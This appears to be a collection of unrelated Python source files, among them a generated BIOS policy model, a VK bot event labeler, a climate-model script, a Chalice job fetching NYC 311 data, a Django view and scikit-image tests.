Sets the txt_support of this BiosPolicy.
BIOS Token for setting Intel Trusted Execution Technology Support configuration
:param txt_support: The txt_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if txt_support not in allowed_values:
raise ValueError(
"Invalid value for `txt_support` ({0}), must be one of {1}"
.format(txt_support, allowed_values)
)
self._txt_support = txt_support
@property
def ucsm_boot_order_rule(self):
"""
Gets the ucsm_boot_order_rule of this BiosPolicy.
BIOS Token for setting Boot Order Rules configuration
:return: The ucsm_boot_order_rule of this BiosPolicy.
:rtype: str
"""
return self._ucsm_boot_order_rule
@ucsm_boot_order_rule.setter
def ucsm_boot_order_rule(self, ucsm_boot_order_rule):
"""
Sets the ucsm_boot_order_rule of this BiosPolicy.
BIOS Token for setting Boot Order Rules configuration
:param ucsm_boot_order_rule: The ucsm_boot_order_rule of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Loose", "Strict"]
if ucsm_boot_order_rule not in allowed_values:
raise ValueError(
"Invalid value for `ucsm_boot_order_rule` ({0}), must be one of {1}"
.format(ucsm_boot_order_rule, allowed_values)
)
self._ucsm_boot_order_rule = ucsm_boot_order_rule
@property
def usb_emul6064(self):
"""
Gets the usb_emul6064 of this BiosPolicy.
BIOS Token for setting Port 60/64 Emulation configuration
:return: The usb_emul6064 of this BiosPolicy.
:rtype: str
"""
return self._usb_emul6064
@usb_emul6064.setter
def usb_emul6064(self, usb_emul6064):
"""
Sets the usb_emul6064 of this BiosPolicy.
BIOS Token for setting Port 60/64 Emulation configuration
:param usb_emul6064: The usb_emul6064 of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_emul6064 not in allowed_values:
raise ValueError(
"Invalid value for `usb_emul6064` ({0}), must be one of {1}"
.format(usb_emul6064, allowed_values)
)
self._usb_emul6064 = usb_emul6064
@property
def usb_port_front(self):
"""
Gets the usb_port_front of this BiosPolicy.
BIOS Token for setting USB Port Front configuration
:return: The usb_port_front of this BiosPolicy.
:rtype: str
"""
return self._usb_port_front
@usb_port_front.setter
def usb_port_front(self, usb_port_front):
"""
Sets the usb_port_front of this BiosPolicy.
BIOS Token for setting USB Port Front configuration
:param usb_port_front: The usb_port_front of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_front not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_front` ({0}), must be one of {1}"
.format(usb_port_front, allowed_values)
)
self._usb_port_front = usb_port_front
@property
def usb_port_internal(self):
"""
Gets the usb_port_internal of this BiosPolicy.
BIOS Token for setting USB Port Internal configuration
:return: The usb_port_internal of this BiosPolicy.
:rtype: str
"""
return self._usb_port_internal
@usb_port_internal.setter
def usb_port_internal(self, usb_port_internal):
"""
Sets the usb_port_internal of this BiosPolicy.
BIOS Token for setting USB Port Internal configuration
:param usb_port_internal: The usb_port_internal of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_internal not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_internal` ({0}), must be one of {1}"
.format(usb_port_internal, allowed_values)
)
self._usb_port_internal = usb_port_internal
@property
def usb_port_kvm(self):
"""
Gets the usb_port_kvm of this BiosPolicy.
BIOS Token for setting USB Port KVM configuration
:return: The usb_port_kvm of this BiosPolicy.
:rtype: str
"""
return self._usb_port_kvm
@usb_port_kvm.setter
def usb_port_kvm(self, usb_port_kvm):
"""
Sets the usb_port_kvm of this BiosPolicy.
BIOS Token for setting USB Port KVM configuration
:param usb_port_kvm: The usb_port_kvm of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_kvm not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_kvm` ({0}), must be one of {1}"
.format(usb_port_kvm, allowed_values)
)
self._usb_port_kvm = usb_port_kvm
@property
def usb_port_rear(self):
"""
Gets the usb_port_rear of this BiosPolicy.
BIOS Token for setting USB Port Rear configuration
:return: The usb_port_rear of this BiosPolicy.
:rtype: str
"""
return self._usb_port_rear
@usb_port_rear.setter
def usb_port_rear(self, usb_port_rear):
"""
Sets the usb_port_rear of this BiosPolicy.
BIOS Token for setting USB Port Rear configuration
:param usb_port_rear: The usb_port_rear of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_rear not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_rear` ({0}), must be one of {1}"
.format(usb_port_rear, allowed_values)
)
self._usb_port_rear = usb_port_rear
@property
def usb_port_sd_card(self):
"""
Gets the usb_port_sd_card of this BiosPolicy.
BIOS Token for setting USB Port SD Card configuration
:return: The usb_port_sd_card of this BiosPolicy.
:rtype: str
"""
return self._usb_port_sd_card
@usb_port_sd_card.setter
def usb_port_sd_card(self, usb_port_sd_card):
"""
Sets the usb_port_sd_card of this BiosPolicy.
BIOS Token for setting USB Port SD Card configuration
:param usb_port_sd_card: The usb_port_sd_card of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_sd_card not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_sd_card` ({0}), must be one of {1}"
.format(usb_port_sd_card, allowed_values)
)
self._usb_port_sd_card = usb_port_sd_card
@property
def usb_port_vmedia(self):
"""
Gets the usb_port_vmedia of this BiosPolicy.
BIOS Token for setting USB Port VMedia configuration
:return: The usb_port_vmedia of this BiosPolicy.
:rtype: str
"""
return self._usb_port_vmedia
@usb_port_vmedia.setter
def usb_port_vmedia(self, usb_port_vmedia):
"""
Sets the usb_port_vmedia of this BiosPolicy.
BIOS Token for setting USB Port VMedia configuration
:param usb_port_vmedia: The usb_port_vmedia of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_vmedia not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_vmedia` ({0}), must be one of {1}"
.format(usb_port_vmedia, allowed_values)
)
self._usb_port_vmedia = usb_port_vmedia
@property
def usb_xhci_support(self):
"""
Gets the usb_xhci_support of this BiosPolicy.
BIOS Token for setting XHCI Legacy Support configuration
:return: The usb_xhci_support of this BiosPolicy.
:rtype: str
"""
return self._usb_xhci_support
@usb_xhci_support.setter
def usb_xhci_support(self, usb_xhci_support):
"""
Sets the usb_xhci_support of this BiosPolicy.
BIOS Token for setting XHCI Legacy Support configuration
:param usb_xhci_support: The usb_xhci_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_xhci_support not in allowed_values:
raise ValueError(
"Invalid value for `usb_xhci_support` ({0}), must be one of {1}"
.format(usb_xhci_support, allowed_values)
)
self._usb_xhci_support = usb_xhci_support
@property
def vga_priority(self):
"""
Gets the vga_priority of this BiosPolicy.
BIOS Token for setting VGA Priority configuration
:return: The vga_priority of this BiosPolicy.
:rtype: str
"""
return self._vga_priority
@vga_priority.setter
def vga_priority(self, vga_priority):
"""
Sets the vga_priority of this BiosPolicy.
BIOS Token for setting VGA Priority configuration
:param vga_priority: The vga_priority of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Offboard", "Onboard", "Onboard VGA Disabled"]
if vga_priority not in allowed_values:
raise ValueError(
"Invalid value for `vga_priority` ({0}), must be one of {1}"
.format(vga_priority, allowed_values)
)
self._vga_priority = vga_priority
@property
def vmd_enable(self):
"""
Gets the vmd_enable of this BiosPolicy.
BIOS Token for setting VMD Enablement configuration
:return: The vmd_enable of this BiosPolicy.
:rtype: str
"""
return self._vmd_enable
@vmd_enable.setter
def vmd_enable(self, vmd_enable):
"""
Sets the vmd_enable of this BiosPolicy.
BIOS Token for setting VMD Enablement configuration
:param vmd_enable: The vmd_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if vmd_enable not in allowed_values:
raise ValueError(
"Invalid value for `vmd_enable` ({0}), must be one of {1}"
.format(vmd_enable, allowed_values)
)
self._vmd_enable = vmd_enable
@property
def work_load_config(self):
"""
Gets the work_load_config of this BiosPolicy.
BIOS Token for setting Workload Configuration configuration
:return: The work_load_config of this BiosPolicy.
:rtype: str
"""
return self._work_load_config
@work_load_config.setter
def work_load_config(self, work_load_config):
"""
Sets the work_load_config of this BiosPolicy.
BIOS Token for setting Workload Configuration configuration
:param work_load_config: The work_load_config of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Balanced", "I/O Sensitive", "NUMA", "UMA"]
if work_load_config not in allowed_values:
raise ValueError(
"Invalid value for `work_load_config` ({0}), must be one of {1}"
.format(work_load_config, allowed_values)
)
self._work_load_config = work_load_config
@property
def xpt_prefetch(self):
"""
Gets the xpt_prefetch of this BiosPolicy.
BIOS Token for setting XPT Prefetch configuration
:return: The xpt_prefetch of this BiosPolicy.
:rtype: str
"""
return self._xpt_prefetch
@xpt_prefetch.setter
def xpt_prefetch(self, xpt_prefetch):
"""
Sets the xpt_prefetch of this BiosPolicy.
BIOS Token for setting XPT Prefetch configuration
:param xpt_prefetch: The xpt_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if xpt_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `xpt_prefetch` ({0}), must be one of {1}"
.format(xpt_prefetch, allowed_values)
)
self._xpt_prefetch = xpt_prefetch
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, BiosPolicy):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
python
|
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Type, Union
from vkbottle import ABCView, BaseReturnManager
from vkbottle.dispatch.handlers import FromFuncHandler
from vkbottle.framework.bot import BotLabeler
from vkbottle.modules import logger
from vkbottle_types.events import MessageEvent as _MessageEvent
from vkbottle_callback.rules import *
from vkbottle_callback.types import MessageEvent
if TYPE_CHECKING:
from vkbottle import ABCAPI, ABCStateDispenser
from vkbottle.dispatch.rules import ABCRule
from vkbottle.dispatch.views import ABCView
from vkbottle.dispatch.views.bot import ABCBotMessageView, RawBotEventView
from vkbottle.framework.bot.labeler.abc import LabeledMessageHandler
class MessageEventReturnHandler(BaseReturnManager):
@BaseReturnManager.instance_of(str)
async def str_handler(self, value: str, event: MessageEvent, _: dict):
await event.show_snackbar(value)
def message_event_min(event: dict, ctx_api: "ABCAPI") -> "MessageEvent":
update = _MessageEvent(**event)
message_event = MessageEvent(
**update.object.dict(),
group_id=update.group_id,
)
setattr(message_event, "unprepared_ctx_api", ctx_api)
return message_event
class MessageEventView(ABCView):
def __init__(self):
super().__init__()
self.handler_return_manager = MessageEventReturnHandler()
async def process_event(self, event: dict) -> bool:
return event["type"] == "message_event"
async def handle_event(
self, event: dict, ctx_api: "ABCAPI", state_dispenser: "ABCStateDispenser"
) -> None:
logger.debug("Handling event ({}) with message_event view".format(event.get("event_id")))
context_variables: dict = {}
message_event = message_event_min(event, ctx_api)
message_event.state_peer = await state_dispenser.cast(message_event.peer_id)
mw_instances = await self.pre_middleware(message_event, context_variables) # type: ignore
if mw_instances is None:
logger.info("Handling stopped, pre_middleware returned error")
return
handle_responses = []
handlers = []
for handler in self.handlers:
result = await handler.filter(message_event) # type: ignore
logger.debug("Handler {} returned {}".format(handler, result))
if result is False:
continue
elif isinstance(result, dict):
context_variables.update(result)
handler_response = await handler.handle(message_event, **context_variables) # type: ignore
handle_responses.append(handler_response)
handlers.append(handler)
return_handler = self.handler_return_manager.get_handler(handler_response)
if return_handler is not None:
await return_handler(
self.handler_return_manager, handler_response, message_event, context_variables
)
if handler.blocking:
break
await self.post_middleware(mw_instances, handle_responses, handlers)
LabeledMessageEventHandler = Callable[..., Callable[[MessageEvent], Any]]
DEFAULT_CUSTOM_RULES: Dict[str, Type[ABCMessageEventRule]] = {
"from_chat": PeerRule,
"peer_ids": FromPeerRule,
"payload": PayloadRule,
"payload_contains": PayloadContainsRule,
"payload_map": PayloadMapRule,
"func": FuncRule,
"coro": CoroutineRule,
"coroutine": CoroutineRule,
"state": StateRule
}
class MessageEventLabeler(BotLabeler):
def __init__(
self,
message_view: Optional["ABCBotMessageView"] = None,
raw_event_view: Optional["RawBotEventView"] = None,
custom_rules: Optional[Dict[str, Type["ABCRule"]]] = None,
auto_rules: Optional[List["ABCRule"]] = None,
message_event_view: Optional["MessageEventView"] = None
):
super().__init__(message_view, raw_event_view, custom_rules, auto_rules)
self.custom_rules = custom_rules or DEFAULT_CUSTOM_RULES
self.message_event_view = message_event_view or MessageEventView()
def message_event(
self, *rules: "ABCRule", blocking: bool = True, **custom_rules
) -> "LabeledMessageHandler":
def decorator(func):
self.message_event_view.handlers.append(
FromFuncHandler(
func,
*rules,
*self.auto_rules,
*self.get_custom_rules(custom_rules),
blocking=blocking,
)
)
return func
return decorator
def load(self, labeler: Union[BotLabeler, "MessageEventLabeler"]):
if type(labeler) is MessageEventLabeler:
self.message_event_view.handlers.extend(labeler.message_event_view.handlers)
self.message_event_view.middlewares.update(labeler.message_event_view.middlewares)
self.message_view.handlers.extend(labeler.message_view.handlers)
self.message_view.middlewares.update(labeler.message_view.middlewares)
for event, handler_basements in labeler.raw_event_view.handlers.items():
event_handlers = self.raw_event_view.handlers.get(event)
if event_handlers:
event_handlers.extend(handler_basements)
else:
self.raw_event_view.handlers[event] = handler_basements
self.raw_event_view.middlewares.update(labeler.raw_event_view.middlewares)
def views(self) -> Dict[str, "ABCView"]:
return {
"message": self.message_view,
"message_event": self.message_event_view,
"raw": self.raw_event_view
}
__all__ = (
"MessageEventView",
"MessageEventLabeler"
)
|
python
|
from sympl import (
PlotFunctionMonitor, AdamsBashforth, NetCDFMonitor
)
from climt import SimplePhysics, get_default_state
import numpy as np
from datetime import timedelta
from climt import EmanuelConvection, RRTMGShortwave, RRTMGLongwave, SlabSurface
import matplotlib.pyplot as plt
def plot_function(fig, state):
ax = fig.add_subplot(2, 2, 1)
ax.plot(
state['air_temperature_tendency_from_convection'].to_units(
'degK day^-1').values.flatten(),
state['air_pressure'].to_units('mbar').values.flatten(), '-o')
ax.set_title('Conv. heating rate')
ax.set_xlabel('K/day')
ax.set_ylabel('millibar')
ax.grid()
ax.axes.invert_yaxis()
ax = fig.add_subplot(2, 2, 2)
ax.plot(
state['air_temperature'].values.flatten(),
state['air_pressure'].to_units('mbar').values.flatten(), '-o')
ax.set_title('Air temperature')
ax.axes.invert_yaxis()
ax.set_xlabel('K')
ax.grid()
ax = fig.add_subplot(2, 2, 3)
ax.plot(
state['air_temperature_tendency_from_longwave'].values.flatten(),
state['air_pressure'].to_units('mbar').values.flatten(), '-o',
label='LW')
ax.plot(
state['air_temperature_tendency_from_shortwave'].values.flatten(),
state['air_pressure'].to_units('mbar').values.flatten(), '-o',
label='SW')
ax.set_title('LW and SW Heating rates')
ax.legend()
ax.axes.invert_yaxis()
ax.set_xlabel('K/day')
ax.grid()
ax.set_ylabel('millibar')
ax = fig.add_subplot(2, 2, 4)
net_flux = (state['upwelling_longwave_flux_in_air'] +
state['upwelling_shortwave_flux_in_air'] -
state['downwelling_longwave_flux_in_air'] -
state['downwelling_shortwave_flux_in_air'])
ax.plot(
net_flux.values.flatten(),
state['air_pressure_on_interface_levels'].to_units(
'mbar').values.flatten(), '-o')
ax.set_title('Net Flux')
ax.axes.invert_yaxis()
ax.set_xlabel('W/m^2')
ax.grid()
plt.tight_layout()
monitor = PlotFunctionMonitor(plot_function)
timestep = timedelta(minutes=5)
convection = EmanuelConvection()
radiation_sw = RRTMGShortwave()
radiation_lw = RRTMGLongwave()
slab = SlabSurface()
simple_physics = SimplePhysics()
store_quantities = ['air_temperature',
'air_pressure',
'specific_humidity',
'air_pressure_on_interface_levels',
'air_temperature_tendency_from_convection',
'air_temperature_tendency_from_longwave',
'air_temperature_tendency_from_shortwave']
netcdf_monitor = NetCDFMonitor('rad_conv_eq.nc',
store_names=store_quantities,
write_on_store=True)
convection.current_time_step = timestep
state = get_default_state([simple_physics, convection,
radiation_lw, radiation_sw, slab])
state['air_temperature'].values[:] = 270
state['surface_albedo_for_direct_shortwave'].values[:] = 0.5
state['surface_albedo_for_direct_near_infrared'].values[:] = 0.5
state['surface_albedo_for_diffuse_shortwave'].values[:] = 0.5
state['zenith_angle'].values[:] = np.pi/2.5
state['surface_temperature'].values[:] = 300.
state['ocean_mixed_layer_thickness'].values[:] = 5
state['area_type'].values[:] = 'sea'
time_stepper = AdamsBashforth([convection, radiation_lw, radiation_sw, slab])
for i in range(20000):
convection.current_time_step = timestep
diagnostics, state = time_stepper(state, timestep)
state.update(diagnostics)
diagnostics, new_state = simple_physics(state, timestep)
state.update(diagnostics)
if (i+1) % 20 == 0:
monitor.store(state)
netcdf_monitor.store(state)
print(i, state['surface_temperature'].values)
print(state['surface_upward_sensible_heat_flux'])
print(state['surface_upward_latent_heat_flux'])
state.update(new_state)
state['time'] += timestep
state['eastward_wind'].values[:] = 3.
|
python
|
from threading import Thread
from .data_writer import DataWriter, DataWriterException, PlayerList
from pathlib import Path
from PIL import Image
class ScoredImageWriterException(DataWriterException):
pass
class WriteThread(Thread):
def __init__(self, scored_player_list: PlayerList,
save_dir_path: str):
super(WriteThread, self).__init__()
self.scored_player_list = scored_player_list
self.save_dir_path = Path(save_dir_path)
def run(self):
for scored_player in self.scored_player_list:
image = Image.open(scored_player.param)
image.save(
str(self.save_dir_path/f'{scored_player.score:0=3}.png'))
class ScoredImageWriter(DataWriter):
def __init__(self, save_dir_path: str):
self.save_dir_path = save_dir_path
if not Path(save_dir_path).is_dir():
raise ScoredImageWriterException(f'path is not dir')
def write(self, scored_player_list: PlayerList):
write_thread = WriteThread(scored_player_list, self.save_dir_path)
write_thread.start()
|
python
|
import numpy as np
from qtpy.QtCore import *
from qtpy.QtGui import *
from qtpy.QtWidgets import *
from xicam.core import msg
from xicam.core.data import load_header, NonDBHeader
from xicam.plugins import GUIPlugin, GUILayout, manager as pluginmanager
import pyqtgraph as pg
from functools import partial
from xicam.gui.widgets.dynimageview import DynImageView
from xicam.EFI import widgets
from xicam.gui.widgets.metadataview import MetadataView
from xicam.gui.widgets.tabview import TabView
# from .patches import pyqtgraph_export
# from .patches import pyqtgraph_tiffexporter
class EFIPlugin(GUIPlugin):
name = 'EFI'
sigLog = Signal(int, str, str, np.ndarray)
def __init__(self, *args, **kwargs):
# Data model
self.headermodel = QStandardItemModel()
self.toolbar = QToolBar()
# plot widget
self.reduceWidget = QWidget()
self.plot = pg.PlotWidget()
self.layout = QGridLayout()
self.reduceWidget.setLayout(self.layout)
self.layout.addWidget(self.plot)
x = np.random.random(20)
y = np.random.random(20)
self.plot.plot(x,y)
# table widget
self.tableWidget = QWidget()
self.table = QTableWidget()
self.layout2 = QGridLayout()
self.tableWidget.setLayout(self.layout2)
self.layout2.addWidget(self.table)
self.table.setRowCount(len(x))
self.table.setColumnCount(2)
for i in range(0,len(x)):
self.table.setItem(i,0,QTableWidgetItem(str(round(x[i],3))))
self.table.setItem(i,1,QTableWidgetItem(str(round(y[i],3))))
# Selection model
self.selectionmodel = QItemSelectionModel(self.headermodel)
# Setup TabViews
self.rawview = TabView(self.headermodel, self.selectionmodel, widgets.EFIViewerPlugin, 'primary')
self.reduceview = TabView(self.headermodel, self.selectionmodel, self.reduceWidget)
self.metadataview = MetadataView(self.headermodel, self.selectionmodel)
self.stages = {
'View': GUILayout(self.rawview, top=self.toolbar, right=self.metadataview),
'Reduce': GUILayout(self.reduceWidget, top=self.toolbar, right=self.tableWidget)
# 'View': GUILayout(QLabel('View'))
}
super(EFIPlugin, self).__init__(*args, **kwargs)
def appendHeader(self, header: NonDBHeader, **kwargs):
item = QStandardItem(header.startdoc.get('sample_name', '????'))
item.header = header
self.headermodel.appendRow(item)
self.headermodel.dataChanged.emit(QModelIndex(), QModelIndex())
|
python
|
from pathlib import Path
from slugify import slugify
from watchdog.events import RegexMatchingEventHandler
from kart.miners import DefaultMarkdownMiner
from kart.utils import KartDict
try:
from yaml import CSafeLoader as YamlLoader
except ImportError:
from yaml import SafeLoader as YamlLoader
import importlib
import inspect
import mistune
from jinja2 import contextfilter
from jinja2.runtime import Context
from mistune.directives import Directive
from kart.mappers import Mapper
from kart.markdown import KartMistuneRenderer, TocRenderer
from kart.utils import KartObserver
class DefaultDocumentationMiner(DefaultMarkdownMiner):
"""Miner that recursively looks for data in the ``docs`` folder"""
def __init__(self, directory: str = "docs"):
"Initializes miner. Sets the ``dir`` variable"
self.dir = Path(directory)
def __recursive_read_data(self, config: dict, dir: Path, level: int = 0):
"""Helper function"""
if dir.joinpath("navigation.yml").exists():
nav_file = dir.joinpath("navigation.yml").open()
nav_data = YamlLoader(nav_file.read()).get_data()
paths = []
for x in nav_data:
if "page" in x.keys():
paths.append(dir.joinpath(x["page"]))
elif "section" in x.keys():
paths.append(dir.joinpath(x["section"]))
else:
paths = dir.iterdir()
nav_data = []
for i, item in enumerate(paths):
if item.is_file():
object = self.collect_single_file(item, config)
slug, page = list(object.items())[0]
toc_entry = {"title": page["title"], "slug": slug, "level": level}
self.docs_global_toc.append(toc_entry)
if object:
self.markdown_data.update(object)
elif item.is_dir():
toc_entry = {"title": nav_data[i]["name"], "slug": None, "level": level}
self.docs_global_toc.append(toc_entry)
self.__recursive_read_data(config, item, level + 1)
def read_data(self, config: dict):
self.markdown_data = KartDict()
self.docs_global_toc = []
self.__recursive_read_data(config, self.dir)
def collect(self, config: dict):
return {"docs": self.markdown_data, "docs_global_toc": self.docs_global_toc}
def start_watching(self, config: dict, observer: KartObserver):
"""Registers a watchdog handler that calls read_data() when a file has changed"""
class Handler(RegexMatchingEventHandler):
def on_any_event(_, event):
self.read_data()
self.read_data(config)
observer.schedule(Handler(), self.dir, recursive=True)
class DefaultDocumentationMapper(Mapper):
"""Mapper intended to be used with DefaultDocumentationMapper"""
def __init__(self, template: str = "page.html", base_url: str = ""):
self.template = template
self.base_url = base_url
def map(self, config: dict, site: KartDict) -> dict:
urls = {}
previous_slug = None
for slug, page in site["docs"].items():
if "url" in page:
url = page["url"]
elif slug == "index":
url = "/"
else:
url = "/" + "/".join(slugify(part) for part in slug.split(".")) + "/"
if "template" in page:
template = page["template"]
else:
template = self.template
if len(urls):
page["previous_page"] = previous_slug
urls[previous_slug]["data"]["next_page"] = slug
previous_slug = slug
map_page = {
"url": self.base_url + url,
"data": {**page},
"template": template,
"renderer": "default_site_renderer",
}
urls[slug] = map_page
return urls
class DocumentationDirective(Directive):
"""Mistune class that add the ``function`` and ``class`` directive to build a techical documentation"""
def parse(self, block, m, state):
name = m.group("name")
title = m.group("value")
text = self.parse_text(m)
children = block.parse(text, state, block.rules)
return {"type": name, "children": children, "params": (name, title)}
def render_html_function(self, text, name, loc):
"""Renders the ``function`` directive"""
module_name = ".".join(loc.split(".")[:-1])
func_name = loc.split(".")[-1]
module = importlib.import_module(module_name)
module = importlib.reload(module)
func = module.__dict__[func_name]
sig = inspect.signature(func)
html = "<dl>"
html += f'<dt id="{loc}">function {loc}{sig}</dt>'
html += f"<dd><p>{func.__doc__}</p></dd>"
html += "</dl>"
return html
def render_html_class(self, text, name, loc):
"""Renders the ``class`` directive"""
module_name = ".".join(loc.split(".")[:-1])
func_name = loc.split(".")[-1]
module = importlib.import_module(module_name)
module = importlib.reload(module)
cls = module.__dict__[func_name]
parents = []
for p in cls.__bases__:
parents.append(p.__module__ + "." + p.__name__)
html = '<dl classs="class">'
html += f'<dt id="{loc}">class {loc}({", ".join(parents)})</dt>'
html += f"<dd><p>{cls.__doc__}</p></dd>"
functions = []
for x in inspect.getmembers(cls):
try:
if x[1].__module__ != module_name:
continue
if x[1].__qualname__.split(".")[0] != cls.__name__:
continue
except Exception:
continue
functions.append(cls.__dict__[x[0]])
if functions:
html += "<dl>"
for func in functions:
sig = inspect.signature(func)
if inspect.isabstract(cls) and func.__name__ in cls.__abstractmethods__:
html += "<dt>@abstractmethod</dt>"
html += f"<dt>{func.__name__}{sig}</dt>"
if inspect.getdoc(func):
html += f"<dd><p>{inspect.getdoc(func)}</p></dd>"
if functions:
html += "</dl>"
html += "</dl>"
return html
def render_ast(self, children, name, title=None):
return {"type": name, "children": children, "name": name, "title": title}
def __call__(self, md):
for name in {"function", "class"}:
self.register_directive(md, name)
if md.renderer.NAME == "ast":
md.renderer.register(name, self.render_ast)
if md.renderer.NAME == "html":
md.renderer.register("function", self.render_html_function)
md.renderer.register("class", self.render_html_class)
@contextfilter
def markdown_to_html(context: Context, markdown: str) -> str:
"""Converts markdown data to html.
It supports markdown directives to extract the documentation out of python
docstrings.
"""
return mistune.Markdown(
renderer=KartMistuneRenderer(context=context, escape=False),
plugins=[DocumentationDirective()],
)(markdown)
class DocumentationTocRenderer(TocRenderer):
"""Mistune renderer used by markdown_to_toc()"""
def __init__(self):
self._methods = {"class": self._class}
self.SUPPORTED_ELEMENTS = {"heading", "text", "class", "function"}
def function(self, _, type, name, **kwargs):
"""Renders the ``function`` directive"""
return {"title": name.split(".")[-1], "id": name, "level": 2}
def _class(self, _, type, name, **kwargs):
"""Renders the ``class`` directive"""
return {"title": name.split(".")[-1], "id": name, "level": 2}
def markdown_to_toc(markdown: str) -> str:
"""Extracts a list of header from markdown data"""
return mistune.Markdown(
renderer=DocumentationTocRenderer(),
plugins=[DocumentationDirective()],
)(markdown)
|
python
|
from flask import session
session['var']='oi'
app.run()
app.secret_key = 'minha chave' (vai no main, tem q fazer isso antes de dar app.run)
#lista de funcionarios no depto
#objeto de depto no funcionario
#inserir admin no formulario (criar um admin padrao com TRUE ja)
#listar projetos > ver detalhes do projeto > (lista de funcionarios do projeto)
#> check box com os funcionarios, selecionar os funcionarios que quer vincular
#> enviar
#> ver detalhes > desvincular/adicionar
#> tratar erros pra ver se ja tem repetido....
"""
@app.before_first
def before_first_request():
print('ndsjkd')
@app.before_request
def before_request():
print(request.path)
print('jdklajskd')
#executa smp qndo da uma exceção
@app.after_request
def after_request(response):
print('jdklsa')
return response
"""
|
python
|
from chalice import Chalice
import requests as rq
import boto3
import os
import json
from datetime import date, timedelta
NYCOD = os.environ.get('NYCOPENDATA', None)
BUCKET, KEY = 'philipp-packt', '311data'
resource = 'fhrw-4uyv'
time_col = 'Created Date'
def _upload_json(obj, filename, bucket, key):
S3 = boto3.client('s3', region_name='us-east-1')
key += ('/' + filename)
S3.Object(Bucket=bucket, Key=key).put(Body=json.dumps(obj))
def _get_data(resource, time_col, date, offset=0):
'''collect data from NYC open data
'''
Q = f"where=created_date between '{date:%Y-%m-%d}' AND '{date:%Y-%m-%d}T23:59:59.000'"
url = f'https://data.cityofnewyork.us/resource/{resource}.json?$limit=50000&$offset={offset}&${Q}'
headers = {"X-App-Token": NYCOD} if NYCOD else None
r = rq.get(url, headers=headers)
r.raise_for_status()
data = r.json()
if len(data) == 50_000:
offset2 = offset + 50000
data2 = _get_data(resource, time_col, date, offset=offset2)
data.extend(data2)
return data
app = Chalice(app_name='collect-311')
@app.schedule('rate(1 day)')
def get_data(event):
yesterday = date.today() - timedelta(days=1)
data = _get_data(resource, time_col, yesterday, offset=0)
_upload_json(data, f'{yesterday:%Y-%m-%d}.json', bucket=BUCKET, key=KEY)
|
python
|
from django.shortcuts import render, get_object_or_404
from django.views.generic import (DetailView, UpdateView)
from django.contrib.auth.mixins import (LoginRequiredMixin,
PermissionRequiredMixin)
from .models import Company
class CompanyDetailView(LoginRequiredMixin, DetailView):
"""Detalle de una empresa."""
model = Company
def get_object(self, queryset=None):
return get_object_or_404(self.model, pk=self.kwargs.get("company"))
|
python
|
import numpy as np
from skimage._shared import testing
from skimage._shared.testing import assert_equal
from skimage.util._label import label_points
def test_label_points_coords_dimension():
coords, output_shape = np.array([[1, 2], [3, 4]]), (5, 5, 2)
with testing.raises(ValueError):
label_points(coords, output_shape)
def test_label_points_coords_range():
coords, output_shape = np.array([[0, 0],
[5, 5]]), (5, 5)
with testing.raises(IndexError):
label_points(coords, output_shape)
def test_label_points_coords_negative():
coords, output_shape = np.array([[-1, 0],
[5, 5]]), (5, 5)
with testing.raises(ValueError):
label_points(coords, output_shape)
def test_label_points_two_dimensional_output():
coords, output_shape = np.array([[0, 0],
[1, 1],
[2, 2],
[3, 3],
[4, 4]]), (5, 5)
mask = label_points(coords, output_shape)
assert_equal(mask, np.array([[1, 0, 0, 0, 0],
[0, 2, 0, 0, 0],
[0, 0, 3, 0, 0],
[0, 0, 0, 4, 0],
[0, 0, 0, 0, 5]]))
def test_label_points_multi_dimensional_output():
coords, output_shape = np.array([[0, 0, 0],
[1, 1, 1],
[2, 2, 2],
[3, 3, 0],
[4, 4, 1]]), (5, 5, 3)
mask = label_points(coords, output_shape)
result = np.array([
[
[1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]
],
[
[0, 0, 0], [0, 2, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]
],
[
[0, 0, 0], [0, 0, 0], [0, 0, 3], [0, 0, 0], [0, 0, 0]
],
[
[0, 0, 0], [0, 0, 0], [0, 0, 0], [4, 0, 0], [0, 0, 0]
],
[
[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 5, 0]
]
